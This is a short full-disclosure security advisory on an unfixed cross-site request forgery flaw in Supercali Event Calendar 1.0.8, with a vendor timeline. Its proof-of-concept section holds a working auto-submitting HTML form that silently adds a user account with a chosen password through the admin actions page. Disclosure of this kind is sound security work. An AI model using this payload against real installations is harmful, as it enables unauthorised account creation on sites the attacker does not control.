Supercali Event Calendar 1.0.8: CSRF

Supercali Event Calendar 1.0.8: CSRF

Date: 2015-10-07 15:59:43
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Supercali Event Calendar 1.0.8
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website:
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 09/01/2015
Disclosed to public: 10/07/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description

None of the forms of Supercali Event Calendar 1.0.8 have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in.

3. Proof of Concept

Add a User:

<html> <body> <form name="myform" action="http://localhost/supercali-1.0.8/supercali-1.0.8/admin_actions.php" method="POST"> <input type="hidden" name="id" value="add" /> <input type="hidden" name="email" value="admin2" /> <input type="hidden" name="new_password" value="foo" /> <input type="hidden" name="return_to" value="" /> <input type="hidden" name="mode" value="Add Profile" /> <input type="submit" value="Submit request" /> </form> <script>document.myform.submit();</script> </body> </html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
10/07/2015 Disclosed to public